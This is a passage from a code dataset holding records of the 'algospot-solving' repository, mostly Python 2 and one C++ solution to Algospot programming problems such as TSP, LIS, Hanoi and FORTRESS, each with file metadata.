[31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n m, d, s = rl().split()\n m = int(m)-1\n d = int(d)\n s = week_day.index(s)\n\n start = d - s\n ret = [\"\",]*7\n\n for i in xrange(7):\n # Count a day of previous month\n if start + i < 1:\n if m == 1:\n ret[i] = str(start + i + number_day[11])\n else:\n ret[i] = str(start + i + number_day[m-1])\n # Count a day 
of next month\n elif start + i > number_day[m]:\n ret[i] = str(start + i - number_day[m])\n else:\n ret[i] = str(start + i)\n\n print ' '.join(ret)\n" }, { "alpha_fraction": 0.40221402049064636, "alphanum_fraction": 0.4206642210483551, "avg_line_length": 21.58333396911621, "blob_id": "bbfb4e91a5f1e38f15269fc09323fc7ac0e3758c", "content_id": "97eaac65795044e7b6a324256e5be1e5d1572d3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "no_license", "max_line_length": 42, "num_lines": 12, "path": "/DRAWRECT/DRAWRECT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n x,y = 0,0\n for _ in xrange(3):\n input = map(int, rl().split())\n x ^= input[0]\n y ^= input[1]\n\n print x, y\n" }, { "alpha_fraction": 0.4858638644218445, "alphanum_fraction": 0.49738219380378723, "avg_line_length": 23.487178802490234, "blob_id": "186a61a1c3bc88eacae44bf48cca0396852a3c25", "content_id": "c6b37037f1006c893f5184103f0cebb202ea8a3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 955, "license_type": "no_license", "max_line_length": 64, "num_lines": 39, "path": "/TSP1/TSP1.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ngraph = None\ncache = None\n\ndef dp(n, here, visited):\n if cache[here][visited] >= 0:\n return cache[here][visited]\n\n cache[here][visited] = sys.maxint\n for nxt in xrange(n):\n if visited & (1<<nxt):\n continue\n if visited + (1<<nxt) == ((1 << n)-1):\n m = graph[here][nxt]\n else:\n m = graph[here][nxt]+ dp(n, nxt, visited + (1<<nxt))\n cache[here][visited] = min(cache[here][visited], m)\n\n return cache[here][visited]\n\ndef solve(n):\n ret = sys.maxint\n for i in xrange(n):\n ret = min(ret, dp(n, i, 1<<i))\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n n = int(rl())\n graph = []\n cache = [[-1]*(2**n) for _ in xrange(n)]\n\n for i in xrange(n):\n input = map(float, rl().split())\n graph.append(input)\n\n print \"{:.10f}\".format(solve(n))\n" }, { "alpha_fraction": 0.5880281925201416, "alphanum_fraction": 0.6038732528686523, "avg_line_length": 16.212121963500977, "blob_id": "736ae54674a20c7860ca93cad66cc4099be4c6d1", "content_id": "d50f8a4666e50347890065c30c610f5a9af42d2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 568, "license_type": "no_license", "max_line_length": 53, "num_lines": 33, "path": "/LIS/LIS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ncache = []\nseq = None\ndef solve(sequence):\n\tglobal cache\n\tglobal seq\n\n\tseq = sequence\n\tn = len(seq)\n\tcache = [-1] * n\n\tfor i in xrange(n-1,-1,-1):\n\t\tlis(i)\n\treturn max(cache)\n\ndef lis(index):\n\tglobal seq\n\tif cache[index] != -1:\n\t\treturn cache[index]\n\n\tcache[index]= 1\n\tfor i in xrange(index+1,len(seq)):\n\t\tif seq[index] < seq[i]:\n\t\t\tcache[index] = max(cache[index], lis(i)+1)\n\n\treturn cache[index]\n\nif __name__ == \"__main__\":\n\trl = lambda: sys.stdin.readline().rstrip('\\t\\r\\n\\0')\n\n\tfor _ in xrange(int(rl())):\n\t\trl()\n\t\tprint solve(map(int, rl().split()))\n" }, { "alpha_fraction": 0.5375722646713257, "alphanum_fraction": 0.5375722646713257, "avg_line_length": 27.83333396911621, "blob_id": 
"53b129d61234d98ee971be17fe8a0aab607f85aa", "content_id": "2589d19c3ff1a9b4d1544ac6045e888c20f5139b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/LECTURE/LECTURE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport re\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n print \"\".join(sorted(re.findall('..', rl())))\n" }, { "alpha_fraction": 0.5096085667610168, "alphanum_fraction": 0.5138790011405945, "avg_line_length": 22.41666603088379, "blob_id": "d9f96d4795a66c2e97a1ba4a55fa41e66971d40e", "content_id": "4c14d138cb408b58cd2c20e78d1a56e03b50c52d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1405, "license_type": "no_license", "max_line_length": 65, "num_lines": 60, "path": "/XORNECKLACE/XORNECKLACE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\n# XOR has always positive value\n# So, Maximum is always using full-length necklace\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n\n for _ in xrange(int(rl())):\n N = int(rl())\n necklace = map(int, rl().split())\n ret = 0\n for i in xrange(len(necklace)):\n ret += necklace[i-1]^necklace[i]\n\n print ret\n\n# Below anser is dynamic programing solution\n# But, memory limit exceeded because cache\n#\n# necklace = None\n# cache = None\n#\n# def solve(visited):\n# t = tuple(visited)\n# if t in cache:\n# return cache[t]\n#\n#\n# bead_list = []\n# for i in xrange(len(visited)):\n# if visited[i]:\n# bead_list.append(i)\n#\n# if len(bead_list) == 1:\n# return 0\n#\n# ret = 0\n# for i in xrange(len(bead_list)):\n# ret += necklace[bead_list[i-1]]^necklace[bead_list[i]]\n#\n# for i in xrange(len(visited)):\n# if visited[i]:\n# visited[i] = False\n# ret = max(ret, solve(visited))\n# visited[i] = True\n#\n# cache[t] = ret\n# return ret\n#\n# if __name__ == \"__main__\":\n# rl = lambda : sys.stdin.readline()\n#\n# for _ in xrange(int(rl())):\n# N = int(rl())\n# necklace = map(int, rl().split())\n# visited = [True] * len(necklace)\n# cache = dict()\n# print solve(visited)\n# print cache\n" }, { "alpha_fraction": 0.4284304082393646, "alphanum_fraction": 0.45804542303085327, "avg_line_length": 20.10416603088379, "blob_id": "ad7ce174381bc9848c151b598196a63893e11830", "content_id": "84dee4b1afff8ddee2b9e39300263384b325207b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1013, "license_type": "no_license", "max_line_length": 82, "num_lines": 48, "path": "/PI/PI.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef decision(str):\n n = len(str)\n if [str[0]]*n == str:\n return 1\n\n diff = str[0] - str[1]\n progressive = True\n for i in xrange(n-1):\n if diff != str[i] - str[i+1]:\n progressive = False\n break\n\n if progressive:\n if abs(diff) == 1:\n return 2\n else:\n return 5\n\n for i in xrange(n):\n if str[i] != str[i%2]:\n return 10\n\n return 4\n\n\ndef solve(PI):\n n = len(PI)\n cache = [sys.maxint] * (n)\n cache[2] = decision(PI[0:3])\n cache[3] = decision(PI[0:4])\n cache[4] = decision(PI[0:5])\n\n for i in xrange(3,n):\n try:\n for j in xrange(3,6):\n if i-j >= 0:\n cache[i] = min(decision(PI[i-j+1:i+1]) + cache[i-j], cache[i])\n except:\n continue\n print cache[-1]\n\nif __name__ 
== \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n\n for _ in xrange(int(rl())):\n solve(map(int,list(rl())))\n" }, { "alpha_fraction": 0.41695383191108704, "alphanum_fraction": 0.43487250804901123, "avg_line_length": 24.910715103149414, "blob_id": "3af812702b22e684353f0bb242baac477d727c92", "content_id": "36f37d0588497f95d365a1a70f2ae68250d259e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1451, "license_type": "no_license", "max_line_length": 57, "num_lines": 56, "path": "/ENCODING/ENCODING.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\n\ndef solve(r, c, s):\n bin_list = \"\"\n for char in s:\n if char == \" \":\n bin_list += \"00000\"\n else:\n bin_list += \"{:05b}\".format(ord(char)-64)\n\n pos = 0\n direction = 0\n dir_list = [1, c,-1, -c]\n ret = [-1]*(r*c)\n try:\n for i in xrange(len(bin_list)):\n ret[pos] = bin_list[i]\n pos += dir_list[direction]\n need_change_dir = False\n\n # Case : Visit string at matrix outside\n if direction == 0 and pos == c:\n need_change_dir = True\n elif direction == 1 and pos >= r*c:\n need_change_dir = True\n # Case : Visit already visted string\n elif ret[pos] != -1:\n need_change_dir = True\n\n if need_change_dir:\n pos -= dir_list[direction]\n direction = (direction+1)%4\n pos += dir_list[direction]\n except:\n return \"0\"\n\n for i in xrange(len(ret)):\n if ret[i] == -1:\n ret[i] = \"0\"\n\n return \"\".join(ret)\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip('\\t\\r\\n\\0')\n for i in xrange(int(rl())):\n input = rl()\n # for i in xrange(len(input)):\n try:\n r, c, s = input.split(' ', 2)\n except:\n r, c = input.split(' ', 2)\n s = \"\"\n\n r, c = int(r), int(c)\n print i+1, solve(r, c, s)\n" }, { "alpha_fraction": 0.458781361579895, "alphanum_fraction": 0.47311827540397644, "avg_line_length": 22.25, "blob_id": "4668a42fea619ea81fa4b864ff73b0174570782d", "content_id": "0ae4d10f13ab68b4ec8cd87016229ba7b48dc506", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 279, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/MISPELL/MISPELL.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n d = []\n for _ in xrange(int(rl())):\n input = rl().split()\n n, str = int(input[0]), input[1]\n d.append(str[:n-1]+str[n:])\n\n for i, v in enumerate(d):\n print i+1, v\n" }, { "alpha_fraction": 0.3533487319946289, "alphanum_fraction": 0.37505772709846497, "avg_line_length": 18.862384796142578, "blob_id": "1080b5b9b189598f918efb51323ad15c234bca67", "content_id": "28bdeb8daabf7268b4614b5f22eca15d0b5f182b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2165, "license_type": "no_license", "max_line_length": 69, "num_lines": 109, "path": "/HANOI4/HANOI4.cpp", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <queue>\n#include <cstring>\n#include <cmath>\n#include <sstream>\n\nusing namespace std;\n\nconst int MAX_DISCS = 12;\nint c[1<<(MAX_DISCS*2)];\n\nint get(int state, int index) {\n return (state >> ( index *2)) & 3;\n}\n\nint set(int state, int index, int value) {\n return value << (index*2) | (state & ~(3 << (index*2)));\n}\n\nint inc(int x) {\n if(x < 0)\n return x-1;\n else\n return 
x+1;\n}\n\nint sgn(int x) {\n if(!x)\n return 0;\n return x> 0? 1: -1;\n}\n\nint solve(int discs, int begin) {\n int end = 0;\n for(int i=0; i< discs; ++i) {\n end = set(end, i, 3);\n }\n\n if(end == begin)\n return 0;\n\n queue<int> q;\n memset(c,0,sizeof(c));\n\n q.push(begin);\n q.push(end);\n c[begin] = 1;\n c[end] = -1;\n\n while (!q.empty()){\n int parent = q.front();\n q.pop();\n int top[4] = {-1,-1,-1,-1};\n for (int i = discs-1; i >= 0; i--) {\n top[get(parent,i)] = i;\n }\n\n\n for(int i =0; i< 4; i++){\n if(top[i] != -1) {\n for(int j = 0; j<4; j++) {\n if (i == j)\n continue;\n\n if (top[j] == -1 || top[i] < top[j] ) {\n int child = set(parent,top[i],j);\n if(c[child] == 0) {\n q.push(child);\n c[child] = inc(c[parent]);\n }\n else if (c[child] * c[parent] < 0){\n return abs(c[child]) + abs(c[parent]) -1;\n }\n\n }\n }\n }\n }\n }\n\n return -1;\n\n}\n\nint main(){\n int cases;\n cin >> cases;\n while(cases--) {\n int discs = 0, begin = 0;\n cin >> discs;\n cin.get();\n for (int i =0; i < 4; i++) {\n string s;\n int n = 0;\n\n getline(cin, s);\n stringstream ss(s);\n\n ss >> n;\n while (ss >> n) {\n begin = set(begin, n-1, i);\n }\n }\n\n cout<<solve(discs, begin)<<endl;\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.40051019191741943, "alphanum_fraction": 0.42517006397247314, "avg_line_length": 26.67058753967285, "blob_id": "a4ab5e5deec3e85ae3b13840958a5751d0275759", "content_id": "0aef460acc442dc159d318153ee7e19de57b7d35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2352, "license_type": "no_license", "max_line_length": 89, "num_lines": 85, "path": "/FORTRESS/FORTRESS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport operator\n\n# Calculate distance between 2 nodes\ndef dist_node(tree, a, b):\n if a == b:\n return -1\n\n ret = 0\n # Always depth of a is bigger than depth of b\n if tree[a][1] < tree[b][1]:\n a, b = b, a\n\n a_depth = tree[a][1]\n b_depth = tree[b][1]\n while a_depth != b_depth:\n a = tree[a][0]\n a_depth = tree[a][1]\n ret += 1\n\n while a != b:\n a = tree[a][0]\n b = tree[b][0]\n ret += 2\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n\n for _ in xrange(int(rl())):\n n = int(rl())\n walls = [None]*n\n tree = [[0,0] for _ in xrange(n)]\n for i in xrange(n):\n input = map(int, rl().split())\n walls[i] = input[2], input[0], input[1]\n\n if n < 4:\n print n-1\n continue\n\n # Make a tree : [parent, depth]\n walls = sorted(walls, reverse=True)\n leaf_nodes = [True]*n\n for i in xrange(n):\n for j in xrange(i+1, n):\n dist = ((walls[i][1]-walls[j][1])**2 + (walls[i][2]-walls[j][2])**2)**0.5\n if walls[i][0] >= dist + walls[j][0]:\n leaf_nodes[i] = False\n tree[j][0] = i\n tree[j][1] += 1\n\n leaf_nodes = [i for i in xrange(n) if leaf_nodes[i]]\n # print dist_node(tree, leaf_nodes[0],leaf_nodes[1])\n\n ret = 0\n for i in xrange(len(leaf_nodes)):\n for j in xrange(i+1, len(leaf_nodes)):\n ret = max(ret, dist_node(tree, leaf_nodes[i], leaf_nodes[j]))\n\n print ret\n #\n #\n # d = dict()\n # for i in xrange(n-1,0,-1):\n # parent = tree[i][0]\n # if parent == 0:\n # if not i in d:\n # d[i] = 1\n # continue\n #\n # while tree[parent][0] != 0:\n # parent = tree[parent][0]\n #\n # if parent in d:\n # d[parent] = max(d[parent], tree[i][1])\n # else:\n # d[parent] = tree[i][1]\n #\n # result = sorted(d.items(), key=operator.itemgetter(1), reverse=True)\n # if len(result) == 1:\n # print 
result[0][1]\n # else:\n # print result[0][1] + result[1][1]\n" }, { "alpha_fraction": 0.6106870174407959, "alphanum_fraction": 0.6633588075637817, "avg_line_length": 41.25806427001953, "blob_id": "a7ec854a2d22c02267446c828de8cbeefb7db7e9", "content_id": "087b59aa8ab86cd86b0430f3d8c358261c448d7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 211, "num_lines": 31, "path": "/DICT/DICT_test.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import unittest\nimport DICT as test\n\nclass Test_DICT(unittest.TestCase):\n def test_default_case(self):\n self.assertEqual(test.solve(5, 2, 11), 'abaaaab')\n self.assertEqual(test.solve(5, 6, 17), 'aaabbabbbab')\n self.assertEqual(test.solve(1, 1, 2), 'ba')\n self.assertEqual(test.solve(4, 0, 2), 'NONE')\n\n def test_zero_case(self):\n self.assertEqual(test.solve(0, 0, 2), 'NONE')\n self.assertEqual(test.solve(0, 0, 1), 'NONE')\n self.assertEqual(test.solve(0, 1, 1), 'b')\n self.assertEqual(test.solve(1, 0, 1), 'a')\n\n def test_maximum_case(self):\n self.assertEqual(test.solve(1, 1, 2), 'ba')\n self.assertEqual(test.solve(5, 2, 21), 'bbaaaaa')\n self.assertEqual(test.solve(10, 10, 184756), 'bbbbbbbbbbaaaaaaaaaa')\n self.assertEqual(test.solve(100, 100, 100000000),\n 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbabbbbbbbbbbabbbbbbbbbbbbbbbbbbbbbbbbbbbba')\n\n def test_exceed_case(self):\n self.assertEqual(test.solve(1, 1, 3), 'NONE')\n self.assertEqual(test.solve(2, 1, 4), 'NONE')\n self.assertEqual(test.solve(5, 5, 253), 'NONE')\n\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.4426395893096924, "alphanum_fraction": 0.46395939588546753, "avg_line_length": 21.9069766998291, "blob_id": "a0fd0a27d29c35f3a8250c87910c1f8733723443", "content_id": "130eae31b270e71b28016530b47063986074a45c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 985, "license_type": "no_license", "max_line_length": 55, "num_lines": 43, "path": "/BRAVEDUCK/BRAVEDUCK.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport math\nimport gc\nimport collections\n\ndef solve(jump, start, end, bridge):\n jump = jump**2\n q = collections.deque()\n q.append(start)\n\n visited = [False] * len(bridge)\n\n while q:\n x1, y1 = q.pop()\n for idx, value in enumerate(bridge):\n if visited[idx]:\n continue\n\n x2 = value[0]\n y2 = value[1]\n\n if jump >= (end[0]-x1)**2 + (end[1]-y1)**2:\n return 'YES'\n\n if jump >= (x1-x2)**2 + (y1-y2)**2:\n visited[idx] = True\n q.append((x2,y2))\n\n return 'NO'\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n\n for _ in xrange(int(rl())):\n jump = int(rl())\n start = map(int, rl().split())\n end = map(int, rl().split())\n bridge = []\n for _ in xrange(int(rl())):\n x,y = map(int, rl().split())\n bridge.append((x,y))\n\n print solve(jump, start, end, bridge)\n" }, { "alpha_fraction": 0.5563991069793701, "alphanum_fraction": 0.5780910849571228, "avg_line_length": 19.44444465637207, "blob_id": "fa41d231ef53201483fb214052e35e4982ca97d7", "content_id": "af3f5143a0caf62dd7e483e8c94d69979319fdd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 922, "license_type": "no_license", "max_line_length": 69, 
"num_lines": 45, "path": "/JUMPGAME/JUMPGAME.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nclass JumpGame():\n\tdef __init__(self, matrix):\n\t\tself.n = len(matrix[0])\n\t\tself.cache = [[-1 for _ in xrange(self.n)] for _ in xrange(self.n)]\n\t\tself.matrix = matrix\n\n\tdef solve(self):\n\t\tret = self.jump(0,0)\n\t\tif ret is 1:\n\t\t\treturn 'YES'\n\t\telse:\n\t\t\treturn 'NO'\n\n\tdef jump(self, y, x):\n\t\tn = self.n\n\t\tif y is n-1 and x is n-1:\n\t\t\treturn 1\n\t\tif y >= n or x >= n:\n\t\t\treturn 0\n\t\tif self.cache[y][x] != -1:\n\t\t\treturn self.cache[y][x]\n\n\t\tjumpSize = self.matrix[y][x]\n\t\tl = self.jump(y+jumpSize, x)\n\t\tr = self.jump(y,x+jumpSize)\n\n\t\tif l is 0 and r is 0:\n\t\t\tself.cache[y][x] = 0\n\t\telse:\n\t\t\tself.cache[y][x] = 1\n\n\t\treturn self.cache[y][x]\n\n\nif __name__ == \"__main__\":\n\tsys.setrecursionlimit(10000)\n\trl = lambda: sys.stdin.readline()\n\tfor _ in xrange(int(rl())):\n\t\tmatrix = []\n\t\tfor _ in xrange(int(rl())):\n\t\t\tmatrix.append(map(int,rl().rstrip(' \\t\\r\\n\\0').split(' ')))\n\t\ttest = JumpGame(matrix)\n\t\tprint test.solve()\n\n\n" }, { "alpha_fraction": 0.4288793206214905, "alphanum_fraction": 0.4579741358757019, "avg_line_length": 20.581396102905273, "blob_id": "0af1adf1bfe0cdd52c5da24a8e4c8d5ef5d60fb1", "content_id": "cc97f69b148d3abc788a37bfc3480c42f1dc4f8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 59, "num_lines": 43, "path": "/JLIS/JLIS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ncache = [[-1] * 101 for _ in xrange(101)]\n\ndef get_max_item(i, j):\n if i is -1:\n a = -sys.maxint\n else:\n a = A[i]\n if j is -1:\n b = -sys.maxint\n else:\n b = B[j]\n return max(a, b)\n\n\ndef jlis(i, j):\n if cache[i+1][j+1] != -1:\n return cache[i+1][j+1]\n\n max_item = get_max_item(i, j)\n ret = 2\n for next_i in xrange(i+1, len(A)):\n if max_item < A[next_i]:\n ret = max(ret, jlis(next_i, j)+1)\n\n for next_j in xrange(j+1, len(B)):\n if max_item < B[next_j]:\n ret = max(ret, jlis(i, next_j)+1)\n\n cache[i+1][j+1] = ret\n return ret\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n global A, B\n for _ in xrange(int(rl())):\n rl()\n A = map(int, rl().split())\n B = map(int, rl().split())\n cache = [[-1]*(len(B)+1) for _ in xrange(len(A)+1)]\n print(jlis(-1, -1)-2)\n" }, { "alpha_fraction": 0.46507352590560913, "alphanum_fraction": 0.4852941036224365, "avg_line_length": 22.65217399597168, "blob_id": "081675cf039322969de30c79fd4eeb7f90bf8bc2", "content_id": "5458971a5ca37f98e0bd948fe38bbfa05b1bf024", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 81, "num_lines": 46, "path": "/BRACKETS/BRACKETS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nd = {'[': ']', '(':')'}\ncache = [[-1]*101 for _ in xrange(101)]\nbrackets = None\n\ndef solve(start, end):\n if start >= end:\n return 0\n\n if cache[start][end] != -1:\n return cache[start][end]\n\n ret = 0\n if brackets[start] == \"(\" or brackets[start] == \"[\":\n s_point = start+1\n while True:\n try :\n next_index = brackets.index(d[brackets[start]], s_point, end+1)\n except :\n break\n\n ret_sub = 2 + solve(start+1, next_index-1) + solve(next_index+1, end)\n ret = max(ret, 
ret_sub)\n s_point = next_index+1\n\n ret = max(ret, solve(start+1, end))\n else:\n ret = solve(start+1, end)\n\n cache[start][end] = ret\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n while True:\n brackets = rl().rstrip()\n\n if brackets == \"end\":\n break\n\n for i in xrange(len(brackets)):\n for j in xrange(len(brackets)):\n cache[i][j] = -1\n\n print solve(0, len(brackets)-1)\n" }, { "alpha_fraction": 0.5265700221061707, "alphanum_fraction": 0.5603864789009094, "avg_line_length": 23.352941513061523, "blob_id": "240751052ac47e02804a76cdc33dd0dfd692511e", "content_id": "ba07bfa3a73a5e22e7a75dca01c18f2ffecd1db4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 414, "license_type": "no_license", "max_line_length": 72, "num_lines": 17, "path": "/TILING2/TILING2.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom math import factorial\n\n\ndef solve(n):\n combination = lambda n, r : factorial(n)/factorial(n-r)/factorial(r)\n x, y = divmod(n,2)\n ret = 0\n for i in xrange(x+1):\n ret += combination(n-i,i)\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n = int(rl())\n print solve(n) % 1000000007\n" }, { "alpha_fraction": 0.44387754797935486, "alphanum_fraction": 0.4719387888908386, "avg_line_length": 18.600000381469727, "blob_id": "f52278fbd2b97a06c51f5c0da0859f25453a8b5f", "content_id": "fc46cddad3c45a2e01297dfeb8322399a65a331d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/ENDIANS/ENDIANS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef trans_order(n):\n x, y = divmod(n, 8)\n ret = 31 - (8*x)\n ret += -7 + y\n\n return ret\n\ndef solve(n):\n ret = 0\n for i in xrange(32):\n if n & (1<<i):\n ret += (1 << trans_order(i))\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n print solve(int(rl()))\n" }, { "alpha_fraction": 0.427238792181015, "alphanum_fraction": 0.46641790866851807, "avg_line_length": 30.52941131591797, "blob_id": "c7dc2ab86d899b2c23efb990c5a51188ea499238", "content_id": "6a00f78d207ebbe4c289b41ae46e2903c6af4a87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 79, "num_lines": 34, "path": "/FOURGODS/FOURGODS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom collections import defaultdict\n\ndef solve(v, e, graph):\n ret = 0\n for start in xrange(v):\n paths = [[0]*v for i in xrange(3)]\n paths[0][start] = 1\n for i in xrange(1,3):\n for j in xrange(v):\n if paths[i-1][j] != 0:\n for k in xrange(v):\n if graph[j][k]:\n paths[i][k] += paths[i-1][j]\n\n for i in xrange(start+1, v):\n if paths[2][i] > 1:\n # Select 2nd, 4th points and then divide 2 because of non-order\n ret += paths[2][i]*(paths[2][i]-1)/2\n\n # Divide 2 because 1st, 3rd points are non-order\n return (ret/2) % 20130728\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n v, e = map(int, rl().split())\n graph = [[False]*v for _ in xrange(v)]\n for _ in xrange(e):\n v1, v2 = map(int, rl().split())\n 
graph[v1-1][v2-1] = True\n graph[v2-1][v1-1] = True\n\n print solve(v, e, graph)\n" }, { "alpha_fraction": 0.4466463327407837, "alphanum_fraction": 0.46417683362960815, "avg_line_length": 20.866666793823242, "blob_id": "408f9669669ab18cb8b22768a993371c0541acd8", "content_id": "ca120371441ddfec2d12ae7f7f3ff35ab1219022", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1312, "license_type": "no_license", "max_line_length": 80, "num_lines": 60, "path": "/DICT/DICT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom math import factorial\n\nnum_combination = lambda n, m: factorial(n) / factorial(abs(n-m)) / factorial(m)\ndef get_order(N,M,K):\n cosum = 1\n zero_select = 1\n for i in xrange(M, N+M):\n calc = num_combination(i, zero_select)\n zero_select += 1\n if cosum + calc >= K:\n return K-cosum, i\n\n cosum += calc\n return None\n\ndef solve(N,M,K):\n if N == 0 and M == 0:\n return \"NONE\"\n\n if N == 0 or M == 0:\n if K == 1:\n return \"a\"*N+\"b\"*M\n else:\n return \"NONE\"\n\n if num_combination(N+M,M) < K:\n return \"NONE\"\n\n n, m, k = N, M, K\n orders = [0]\n\n if k == 1:\n for i in xrange(M):\n orders.append(i)\n\n while k > 1 and n > 0 and m > 0 :\n # Get start point of 1 and remain k\n order = get_order(n,m,k)\n orders.append(order[1])\n k = order[0]\n n -= order[1] - orders[-1]\n m -= 1\n\n if k == 1 and m > 0:\n for i in xrange(m):\n orders.append(i)\n\n ret = [\"a\"]*(N+M)\n for i in orders[1:]:\n ret[-i-1] = \"b\"\n\n return \"\".join(ret)\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n\n for _ in xrange(int(rl())):\n N, M, K = map(int, rl().split())\n print solve(N, M, K)\n" }, { "alpha_fraction": 0.3945578336715698, "alphanum_fraction": 0.4263038635253906, "avg_line_length": 31.66666603088379, "blob_id": "5e9a4d262b44c957a2e17aa6fa9381fe21112a2d", "content_id": "24fca727399fd067e3ff2c16fbbf9538a66f562a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 882, "license_type": "no_license", "max_line_length": 76, "num_lines": 27, "path": "/XHAENEUNG/XHAENEUNG.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nstr_to_int = {\"zero\":0, \"one\":1, \"two\":2, \"three\":3, \"four\":4,\\\n \"five\":5, \"six\":6, \"seven\":7, \"eight\":8, \"nine\":9, \"ten\":10}\nint_to_str = {0:'zero', 1:'one', 2:'two', 3:'three', 4:'four', \\\n 5:'five', 6:'six', 7:'seven', 8:'eight', 9:'nine', 10:'ten'}\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for i in xrange(int(rl())):\n x, oper, y, _, result = rl().split()\n\n if oper == \"+\":\n ret = str_to_int[x] + str_to_int[y]\n elif oper == \"-\":\n ret = str_to_int[x] - str_to_int[y]\n elif oper == \"*\":\n ret = str_to_int[x] * str_to_int[y]\n\n if not (0<=ret<=10):\n print \"No\"\n continue\n \n if sorted(int_to_str[ret]) == sorted(result):\n 